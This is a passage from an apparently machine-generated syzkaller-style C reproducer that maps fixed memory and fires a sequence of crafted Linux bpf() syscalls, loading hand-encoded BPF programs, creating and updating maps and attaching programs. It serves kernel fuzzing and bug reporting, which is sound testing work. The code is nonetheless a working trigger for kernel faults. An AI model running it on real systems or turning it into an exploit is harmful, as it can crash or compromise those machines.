"\xfe\x8e\x45\x9f\xe4\x59\x33\xb7\x8c\x7a\xb5\xfe\x98\x5a\x48\x01\x93" "\xa2\x0f\xb0\x7d\xa1\x45\x5f\xb2\x83\xdf\x68\xaf\x56\x9a\xc8\x2a\xa6" "\xdc\x70\x3e\x29\xbf\x15\x89\x31\xfb\x79\xf2\xab\xfa\x6f\xf7\xeb\x8c" "\x4f\x38\x1c\x9d\xa5\x8b\xea\x46\x0e\x2e\xad\x96\x99\x33\xe5\x39\x19" "\x70\xca\x4f\xdd\xd6\x4d\xa2\xe5\xdf\x9c\x4d\x82\x04\x40\x68\xca\xaa" "\xab\x77\x1b\x37\xbb\x06\xbb\xe6\x73\x05\x6d\x84\x98\x25\x52\x5f\x11" "\x20\xb2\x25\x0f\xc4\x85\x20\x38\x1f\x7a\x74\xb1\xc6\x87\x78\x1c\xb6" "\xb2\x3e\x67\xb9\x18\x84\x4b\x83\xdb\xae\xeb\x55\x9e\xc8\x52\x0d\x71" "\x0d\xd6\xd6\xb4\xe6\x48\x38\xbd\x43\x4a\x7f\x7f\xce\xff\x9a\x7b\xc2" "\xcc\x57\x10\x32\xff\xbc\x9f\x8c\xe9\x70\x41\xe1\xbc\x47\x29\xd5\x39" "\x35\x8d\xc9\x59\x9c\x12\x66\xb9\xce\x2c\xb6\xdd\x0a\xd5\x7a\x6e\x9d" "\x3d\x4a\x11\xa2\x7f\x70\xb2\x93\x4c\x96\x23\x7e\x2b\xa0\x9c\x58\xee" "\xda\x67\x8d\x4d\x08\xb6\xda\x99\xb7\xa8\x6e\x94\x62\x15\xaf\xb1\xb4" "\x87\x92\xfd\xe5\x44\x92\xe3\x06\xcb\x53\x42\xe2\x58\x98\x74\xb6\x03" "\xa1\xde\x97\x2b\x1f\x09\xcc\x35\x00\x96\xf5\xc3\xe8\x14\x11\x8a\xf9" "\xba\x07\x93\xcf\xdf\x20\xc7\x7b\x34\xea\xcf\xdf\x63\xce\x59\xec\x4d" "\x2f\x86\x7b\xf8\x84\xe9\x41\x55\x9b\x06\x8d\x90\x83\x25\x66\x76\x72" "\xb5\xe1\xcf\x71\xf4\x82\x9c\x04\x93\xe8\xb1\x41\x48\x9e\xd9\x26\xb8" "\x22\xbe\xce\xad\x7a\x0a\x2b\x4a\x4c\x00\x8a\xb1\x6b\x61\x6d\x60\xf3" "\x47\xe4\xda\x54\xf0\x64\x43\x50\x7e\xfe\x57\xea\x62\x39\x9e\xf4\xeb" "\x11\xb2\xf5\x59\xe1\xb0\x56\x45\x6a\x53\x99\x8b\xf1\xc6\xd1\x3c\x92" "\xe7\x51\x36\x14\x7f\x91\xae\xcf\x02\x00\x00\xeb\x1b\x51\xbf\x70\x0b" "\x3c\x0b\xf5\x4b\xc3\x74\x5f\xf3\x13\xc5\xe7\x5d\xc6\x63\x86\x89\x7f" "\x6e\xe4\x54\x29\x37\x1b\x8d\x08\x78\xc4\x42\xad\x2f\xe9\xba\xf8\x5c" "\x13\x90\xda\x13\xef\xc3\x53\xcc\xbe\xf9\x50\xc2\x9f\x39\xdd\xf4\x36" "\xf0\xd9\xbf\x1b\xe1\x51\x5e\xd2\x51\xd8\xb6\xf1\x1e\xcb\x16\xb1\xe8" "\xd1\xed\x04\x19\x6e\x9b\x6c\x2f\x9e\x06\x8b\x77\x49\xbb\x6c\x1f\x53" "\x3e\x49\x3f\x22\xc9\x01\x66\x2c\x65\xcb\x76\x1d\xc2\xee\xff\x2f\x69" "\x8b\xd4\xdb\xae\x83\xe2\xdf\xdc\x4f\x1c\x7f\x91\x8a\x00\x51\x5c\x1b" "\xc1\x89\xd1\x0e\xc2\x2b\x35\xc9\x27\x25\xcb\xf0\xba\x24\x4f\xd0\x29" "\xc4\xf0\x26\xf6\x8e\x00\x00\x00\x06\x00\x00\xab\x04\x76\xc3\xfd\x7f" "\x7c\x1e\x5c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\xe4\x3e" "\x39\xd3\xf4\x39\x4f\xbf\xa1\x3c\x41\x6b\x1c\x44\x3c\x5e\x52\xee\xa7" "\x26\x49\x1a\xd7\x51\x00\xeb\xad\x7c\x6d\x5a\x66\x5c\x59\xa3\xfb\x15" "\x8e\x43\xda\x90\x4f\x19\xe7\xe8\xda\xa4\xe9\x03\x90\xb8\xda\x94\x5f" "\x6c\xd7\x85\x36\xc0\xd2\xbe\x07\x22\x1f\x85\xad\x46\xb1\x80\xf2\x56" "\xd4\xd8\x45\x92\x81\x1d\x15\xd6\x58\x96\xb6\x6b\x63\xa4\x67\x05\x33" "\x8b\x67\xb7\x2d\xc1\xc3\x07\x5f\xcd\xc5\xcb\xff\xb0\x36\x61\x51\x63" "\x2b\xa5\xbe\x8a\xe8\x15\xdf\xea\x9f\xad\xfd\x31\xc4\x73\xa2\x4a\x73" "\xd3\xe5\x11\x6c\x30\x23\xb3\x56\x3c\x72\xd2\x6f\xbd\x59\x87\x71\x32" "\xbd\xe5\xca\x4e\xf8\xd9\x2f\xd3\x61\x3c\x76\x8b\x35\x22\x3f\x6f\xd0" "\xb5\xe9\xa8\xb9\x8c\xcc\xf1\xe2\xb4\x61\x2e\x62\x0e\x3a\x15\x9d\x63" "\x65\xc9\x04\x5a\xaa\x82\x6a\xa0\xee\x6d\x26\xcf\x03\x97\xce\x67\x4c" "\x20\x82\x45\x84\xb4\x64\xeb\xdc\x2f\x3e\xa2\x6a\x7a\xec\x45\x70\xb2" "\x42\xa6\x67\x7a\x4e\x91\x87\xf8\x59\x1c\x3a\x9b\xdc\x14\xa3\x1a\xe7" "\xc0\x34\xbb\x19\xda\x84\x5d\xe6\x9d\x13\x00\xe4\xa8\xb6\xe3\x45\xc2" "\xe3\x1c\xdf\x12\x7f\x77\x10\x2e\xf0\xe5\x76\xed\x1f\xf4\x13\x35\x99" "\x88\x2c\x14\x94\x35\x58\x73\x7d\xa0\xed\x24\x66\x03\xd7\x68\x93\x3b" "\x36\xd8\xf8\xdf\x3a\xdd\x2e\x17\xce\x64\x43\x47\xc4\x19\xa7\x79\x5b" "\x63\x08\xd4\x45\x5d\xc6\x80\xbe\x6e\xe2\xee\x7f\xae\x76\x12\x92\xd6" "\x72\x49\xba\xed\xbd\x6c\x03\xec\x95\xdc\x09\x66\xcc\xdb\x31\x9a\xaa" "\x9f\x8a\x35\xb2\x4c\xc7\xb7\xc9\xc4\x79\x34\xa2\x61\xae\xff\x83\x1d" "\xc5\x2d\x9e\x54\xfe\x0d\x54\x64\x1b\x41\x32\x98\x43\x24\x27\xea\xba" "\x26\x5f\x3e\xcb\xff\xbd\x3b\x84\x65\xf1\xac\xf2\x07\x3e\xdb\x06\xf6" "\x52\x41\x74\x49\x09\xea\xd7\x45\xc6\x8b\x26\x08\x03\xe7\x36\x9b\xea" "\xbb\x27\x40\xe5\x5e\x48\x45\x0c\x9c\x33\x99\xcb\x70\x43\x44\x63\xc4" "\x5f\x55\xe4\xfc\x8a\xe7\x37\xfd\x70\x2b\xb4\x6d\x6c\x10\x5d\x9d\xba" "\x8a\x6e\x64\x31\x6a\x26\xd7\xc4\xc7\xca\x5d\x03\x3a\x34\x13\x60\xe2" "\xc5\x0f\x8b\x27\xb2\x85\x62", 3883); *(uint64_t*)0x20000290 = 0x20000040; memcpy((void*)0x20000040, "GPL\000", 4); *(uint32_t*)0x20000298 = 4; *(uint32_t*)0x2000029c = 0x1076; *(uint64_t*)0x200002a0 = 0x20000300; *(uint32_t*)0x200002a8 = 0; *(uint32_t*)0x200002ac = 0; memset((void*)0x200002b0, 0, 16); *(uint32_t*)0x200002c0 = 0; *(uint32_t*)0x200002c4 = 0; *(uint32_t*)0x200002c8 = -1; *(uint32_t*)0x200002cc = 8; *(uint64_t*)0x200002d0 = 0; *(uint32_t*)0x200002d8 = 0; *(uint32_t*)0x200002dc = 0x10; *(uint64_t*)0x200002e0 = 0; *(uint32_t*)0x200002e8 = 0; *(uint32_t*)0x200002ec = 0; *(uint32_t*)0x200002f0 = -1; *(uint32_t*)0x200002f4 = 0; *(uint64_t*)0x200002f8 = 0; *(uint64_t*)0x20000300 = 0; *(uint32_t*)0x20000308 = 0x10; *(uint32_t*)0x2000030c = 0; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000280ul, /*size=*/0x70ul); if (res != -1) r[2] = res; break; case 8: *(uint32_t*)0x20001380 = r[2]; *(uint32_t*)0x20001384 = 0xfe; *(uint64_t*)0x20001388 = 0x20000480; *(uint32_t*)0x200004b4 = 0xffffff3c; *(uint64_t*)0x200004b8 = 0; *(uint32_t*)0x200004e8 = 0; *(uint32_t*)0x200004ec = 0; *(uint64_t*)0x200004f0 = 0; *(uint64_t*)0x200004f8 = 0; *(uint32_t*)0x20000504 = 8; *(uint64_t*)0x20000508 = 0; *(uint32_t*)0x20000510 = 0; *(uint32_t*)0x20000514 = 0; *(uint64_t*)0x20000518 = 0; *(uint64_t*)0x20000520 = 0; *(uint32_t*)0x20000528 = 0; *(uint32_t*)0x2000052c = 0x10; *(uint32_t*)0x20000530 = 8; *(uint32_t*)0x20000534 = 0; *(uint64_t*)0x20000538 = 0; res = syscall(__NR_bpf, /*cmd=*/0xful, /*arg=*/0x20001380ul, /*size=*/0x10ul); if (res != -1) r[3] = *(uint32_t*)0x20000484; break; case 9: *(uint32_t*)0x20000380 = 2; *(uint32_t*)0x20000384 = 4; *(uint32_t*)0x20000388 = 8; *(uint32_t*)0x2000038c = 1; *(uint32_t*)0x20000390 = 0x80; *(uint32_t*)0x20000394 = -1; *(uint32_t*)0x20000398 = 0x1ab9; memset((void*)0x2000039c, 0, 16); *(uint32_t*)0x200003ac = 0; *(uint32_t*)0x200003b0 = -1; *(uint32_t*)0x200003b4 = 3; *(uint32_t*)0x200003b8 = 1; *(uint32_t*)0x200003bc = 5; *(uint64_t*)0x200003c0 = 0; syscall(__NR_bpf, /*cmd=*/0ul, /*arg=*/0x20000380ul, /*size=*/0x48ul); break; case 10: *(uint32_t*)0x20000980 = 4; *(uint32_t*)0x20000984 = 0x16; *(uint64_t*)0x20000988 = 0x20000780; *(uint8_t*)0x20000780 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x20000781, 0, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000781, 0, 4, 4); *(uint16_t*)0x20000782 = 0; *(uint32_t*)0x20000784 = 0x3ff; *(uint8_t*)0x20000788 = 0; *(uint8_t*)0x20000789 = 0; *(uint16_t*)0x2000078a = 0; *(uint32_t*)0x2000078c = 0x9c5; *(uint8_t*)0x20000790 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x20000791, 1, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000791, 1, 4, 4); *(uint16_t*)0x20000792 = 0; *(uint32_t*)0x20000794 = -1; *(uint8_t*)0x20000798 = 0; *(uint8_t*)0x20000799 = 0; *(uint16_t*)0x2000079a = 0; *(uint32_t*)0x2000079c = 0; STORE_BY_BITMASK(uint8_t, , 0x200007a0, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x200007a0, 0, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x200007a0, 0xb, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x200007a1, 2, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007a1, 0, 4, 4); *(uint16_t*)0x200007a2 = 0; *(uint32_t*)0x200007a4 = 0; *(uint8_t*)0x200007a8 = 0x85; *(uint8_t*)0x200007a9 = 0; *(uint16_t*)0x200007aa = 0; *(uint32_t*)0x200007ac = 0x86; STORE_BY_BITMASK(uint8_t, , 0x200007b0, 5, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x200007b0, 1, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x200007b0, 0xd, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x200007b1, 7, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007b1, 0xa, 4, 4); *(uint16_t*)0x200007b2 = 0xfffc; *(uint32_t*)0x200007b4 = 4; *(uint8_t*)0x200007b8 = 0x85; STORE_BY_BITMASK(uint8_t, , 0x200007b9, 0, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007b9, 1, 4, 4); *(uint16_t*)0x200007ba = 0; *(uint32_t*)0x200007bc = 7; *(uint8_t*)0x200007c0 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x200007c1, 3, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007c1, 1, 4, 4); *(uint16_t*)0x200007c2 = 0; *(uint32_t*)0x200007c4 = -1; *(uint8_t*)0x200007c8 = 0; *(uint8_t*)0x200007c9 = 0; *(uint16_t*)0x200007ca = 0; *(uint32_t*)0x200007cc = 0; *(uint8_t*)0x200007d0 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x200007d1, 2, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007d1, 3, 4, 4); *(uint16_t*)0x200007d2 = 0; *(uint32_t*)0x200007d4 = 2; *(uint8_t*)0x200007d8 = 0; *(uint8_t*)0x200007d9 = 0; *(uint16_t*)0x200007da = 0; *(uint32_t*)0x200007dc = 0; *(uint8_t*)0x200007e0 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x200007e1, 1, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007e1, 1, 4, 4); *(uint16_t*)0x200007e2 = 0; *(uint32_t*)0x200007e4 = -1; *(uint8_t*)0x200007e8 = 0; *(uint8_t*)0x200007e9 = 0; *(uint16_t*)0x200007ea = 0; *(uint32_t*)0x200007ec = 0; STORE_BY_BITMASK(uint8_t, , 0x200007f0, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x200007f0, 0, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x200007f0, 0xb, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x200007f1, 8, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007f1, 0, 4, 4); *(uint16_t*)0x200007f2 = 0; *(uint32_t*)0x200007f4 = -1; STORE_BY_BITMASK(uint8_t, , 0x200007f8, 3, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x200007f8, 3, 3, 2); STORE_BY_BITMASK(uint8_t, , 0x200007f8, 3, 5, 3); STORE_BY_BITMASK(uint8_t, , 0x200007f9, 0xa, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007f9, 8, 4, 4); *(uint16_t*)0x200007fa = 0xfff8; *(uint32_t*)0x200007fc = 0; STORE_BY_BITMASK(uint8_t, , 0x20000800, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x20000800, 1, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x20000800, 0xb, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x20000801, 2, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000801, 0xa, 4, 4); *(uint16_t*)0x20000802 = 0; *(uint32_t*)0x20000804 = 0; STORE_BY_BITMASK(uint8_t, , 0x20000808, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x20000808, 0, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x20000808, 0, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x20000809, 2, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000809, 0, 4, 4); *(uint16_t*)0x2000080a = 0; *(uint32_t*)0x2000080c = 0xfffffff8; STORE_BY_BITMASK(uint8_t, , 0x20000810, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x20000810, 0, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x20000810, 0xb, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x20000811, 3, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000811, 0, 4, 4); *(uint16_t*)0x20000812 = 0; *(uint32_t*)0x20000814 = 8; STORE_BY_BITMASK(uint8_t, , 0x20000818, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x20000818, 0, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x20000818, 0xb, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x20000819, 4, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000819, 0, 4, 4); *(uint16_t*)0x2000081a = 0; *(uint32_t*)0x2000081c = 1; *(uint8_t*)0x20000820 = 0x85; *(uint8_t*)0x20000821 = 0; *(uint16_t*)0x20000822 = 0; *(uint32_t*)0x20000824 = 0x82; *(uint8_t*)0x20000828 = 0x95; *(uint8_t*)0x20000829 = 0; *(uint16_t*)0x2000082a = 0; *(uint32_t*)0x2000082c = 0; *(uint64_t*)0x20000990 = 0x20000840; memcpy((void*)0x20000840, "GPL\000", 4); *(uint32_t*)0x20000998 = 0x7fffffff; *(uint32_t*)0x2000099c = 0; *(uint64_t*)0x200009a0 = 0; *(uint32_t*)0x200009a8 = 0x41000; *(uint32_t*)0x200009ac = 3; memset((void*)0x200009b0, 0, 16); *(uint32_t*)0x200009c0 = 0; *(uint32_t*)0x200009c4 = 9; *(uint32_t*)0x200009c8 = -1; *(uint32_t*)0x200009cc = 8; *(uint64_t*)0x200009d0 = 0x20000900; *(uint32_t*)0x20000900 = 3; *(uint32_t*)0x20000904 = 3; *(uint32_t*)0x200009d8 = 8; *(uint32_t*)0x200009dc = 0x10; *(uint64_t*)0x200009e0 = 0; *(uint32_t*)0x200009e8 = 0; *(uint32_t*)0x200009ec = 0; *(uint32_t*)0x200009f0 = -1; *(uint32_t*)0x200009f4 = 1; *(uint64_t*)0x200009f8 = 0; *(uint64_t*)0x20000a00 = 0x20000940; *(uint32_t*)0x20000940 = 3; *(uint32_t*)0x20000944 = 2; *(uint32_t*)0x20000948 = 0xd; *(uint32_t*)0x2000094c = 0xa; *(uint32_t*)0x20000a08 = 0x10; *(uint32_t*)0x20000a0c = 0x3ff; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000980ul, /*size=*/0x90ul); if (res != -1) r[4] = res; break; case 11: *(uint32_t*)0x20000a40 = -1; *(uint32_t*)0x20000a44 = -1; *(uint32_t*)0x20000a48 = 0x36; *(uint32_t*)0x20000a4c = 0x2000; *(uint32_t*)0x20000a50 = 0; *(uint32_t*)0x20000a54 = r[4]; *(uint64_t*)0x20000a58 = 0; syscall(__NR_bpf, /*cmd=*/9ul, /*arg=*/0x20000a40ul, /*size=*/0x20ul); break; case 12: *(uint32_t*)0x20000a80 = 2; *(uint32_t*)0x20000a84 = 4; *(uint32_t*)0x20000a88 = 8; *(uint32_t*)0x20000a8c = 1; *(uint32_t*)0x20000a90 = 0x80; *(uint32_t*)0x20000a94 = -1; *(uint32_t*)0x20000a98 = 6; memset((void*)0x20000a9c, 0, 16); *(uint32_t*)0x20000aac = 0; *(uint32_t*)0x20000ab0 = -1; *(uint32_t*)0x20000ab4 = 3; *(uint32_t*)0x20000ab8 = 2; *(uint32_t*)0x20000abc = 0; *(uint64_t*)0x20000ac0 = 0; res = syscall(__NR_bpf, /*cmd=*/0ul, /*arg=*/0x20000a80ul, /*size=*/0x48ul); if (res != -1) r[5] = res; break; case 13: *(uint32_t*)0x20000c40 = r[5]; *(uint64_t*)0x20000c48 = 0x20000b00; memcpy( (void*)0x20000b00, "\x9d\x72\x15\xbf\x2b\x10\x16\x44\xad\x6e\xa9\x00\x26\x81\xe9\x1d\xec" "\xab\x2c\x07\x99\x19\xb2\x27\xb8\x3f\x7a\xf7\x4e\xd0\x68\x30\x59\x34" "\x74\x38\x40\x4e\x01\x1b\x4a\xcf\xf8\x73\x2a\x54\xdf\x53\xac\x81\x47" "\x47\x81\xa7\xa3\xb9\x43\xc8\x1e\xf2\xc7\x74\x54\xf2\x9a\x1e\x49\x59" "\xef\xd5\x65\xae\x13\x65\xcd\x4d\xf2\xe4\xfb\x86\x94\x20\x67\x72\x02" "\x2f\x2f\x7e\xbe\x94\x03\x96\x62\x7a\x5b\x2a\x09\x9a\xe1\xae\x15\xf2" "\x21\x36\xe9\x87\x02\x43\xd6\xa4\x29\x37\x78\x1b\xa7\x77\xf8\x3f\x41" "\x9b\x98\x63\x9a\x69\x98\xa9\x63\xf6\x26\xee\x78\x69\x38\x3e\xe2\x1d" "\xcc\x36\x3f\xc8\xc6\x28\xd3\xd0\x1b\xfb\x89\x4d\x94\xda\xd6\x1a\xd9" "\x46\x8b\x4c\x15\x76\x12\x6c\xca\x0f\xaf\xd2\xee\x50\xf6\x1d\x3a\x38" "\x83\x51\x76\x3f\x47\x03\x03\xec\x4d\x61\x42\x24\xc6\x8a\xca\x94\xa6" "\xf9\xe4\x3d\x75\x52\xb5\xd8\x7b", 195); *(uint64_t*)0x20000c50 = 0x20000c00; *(uint64_t*)0x20000c58 = 4; syscall(__NR_bpf, /*cmd=*/1ul, /*arg=*/0x20000c40ul, /*size=*/0x20ul); break; case 14: *(uint32_t*)0x20000d40 = 0; res = syscall(__NR_bpf, /*cmd=*/0xdul, /*arg=*/0x20000d40ul, /*size=*/4ul); if (res != -1) r[6] = res; break; case 15: *(uint32_t*)0x20000f40 = 6; *(uint32_t*)0x20000f44 = 3; *(uint64_t*)0x20000f48 = 0x20000dc0; STORE_BY_BITMASK(uint8_t, , 0x20000dc0, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x20000dc0, 1, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x20000dc0, 3, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x20000dc1, 4, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000dc1, 3, 4, 4); *(uint16_t*)0x20000dc2 = 0xfff0; *(uint32_t*)0x20000dc4 = 0x10; *(uint8_t*)0x20000dc8 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x20000dc9, 6, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000dc9, 3, 4, 4); *(uint16_t*)0x20000dca = 0; *(uint32_t*)0x20000dcc = 4; *(uint8_t*)0x20000dd0 = 0; *(uint8_t*)0x20000dd1 = 0; *(uint16_t*)0x20000dd2 = 0; *(uint32_t*)0x20000dd4 = 0; *(uint64_t*)0x20000f50 = 0x20000e00; memcpy((void*)0x20000e00, "syzkaller\000", 10); *(uint32_t*)0x20000f58 = 0; *(uint32_t*)0x20000f5c = 0x17; *(uint64_t*)0x20000f60 = 0x20000e40; *(uint32_t*)0x20000f68 = 0x100; *(uint32_t*)0x20000f6c = 0x71; memset((void*)0x20000f70, 0, 16); *(uint32_t*)0x20000f80 = 0; *(uint32_t*)0x20000f84 = 0x25; *(uint32_t*)0x20000f88 = -1; *(uint32_t*)0x20000f8c = 8; *(uint64_t*)0x20000f90 = 0; *(uint32_t*)0x20000f98 = 0; *(uint32_t*)0x20000f9c = 0x10; *(uint64_t*)0x20000fa0 = 0x20000e80; *(uint32_t*)0x20000e80 = 4; *(uint32_t*)0x20000e84 = 0xb; *(uint32_t*)0x20000e88 = 9; *(uint32_t*)0x20000e8c = 0x10001; *(uint32_t*)0x20000fa8 = 0x10; *(uint32_t*)0x20000fac = 0; *(uint32_t*)0x20000fb0 = 0; *(uint32_t*)0x20000fb4 = 2; *(uint64_t*)0x20000fb8 = 0x20000ec0; *(uint32_t*)0x20000ec0 = -1; *(uint32_t*)0x20000ec4 = -1; *(uint32_t*)0x20000ec8 = r[5]; *(uint64_t*)0x20000fc0 = 0x20000f00; *(uint32_t*)0x20000f00 = 0; *(uint32_t*)0x20000f04 = 2; *(uint32_t*)0x20000f08 = 7; *(uint32_t*)0x20000f0c = 6; *(uint32_t*)0x20000f10 = 5; *(uint32_t*)0x20000f14 = 5; *(uint32_t*)0x20000f18 = 0xb; *(uint32_t*)0x20000f1c = 1; *(uint32_t*)0x20000fc8 = 0x10; *(uint32_t*)0x20000fcc = 0x18; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000f40ul, /*size=*/0x90ul); if (res != -1) r[7] = res; break; case 16: syscall(__NR_bpf, /*cmd=*/0x10ul, /*arg=*/0ul, /*size=*/0ul); break; case 17: *(uint32_t*)0x20001180 = 1; *(uint32_t*)0x20001184 = r[7]; *(uint32_t*)0x20001188 = 0x1f; *(uint32_t*)0x2000118c = 0x20; *(uint32_t*)0x20001190 = r[6]; *(uint32_t*)0x20001194 = -1; *(uint64_t*)0x20001198 = 0; syscall(__NR_bpf, /*cmd=*/8ul, /*arg=*/0x20001180ul, /*size=*/0x20ul); break; case 18: *(uint32_t*)0x20000040 = 0; *(uint32_t*)0x20000044 = r[1]; *(uint32_t*)0x20000048 = 0x26; *(uint32_t*)0x2000004c = 0x2020; *(uint32_t*)0x20000050 = 0; *(uint32_t*)0x20000054 = r[3]; *(uint64_t*)0x20000058 = 0; syscall(__NR_bpf, /*cmd=*/9ul, /*arg=*/0x20000040ul, /*size=*/0x20ul); break; case 19: sprintf((char*)0x200001c0, "0x%016llx", (long long)0xa30d); syscall(__NR_write, /*fd=*/-1, /*buf=*/0x200001c0ul, /*len=*/0xfffffdeful); break; } } int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul); loop(); return 0; }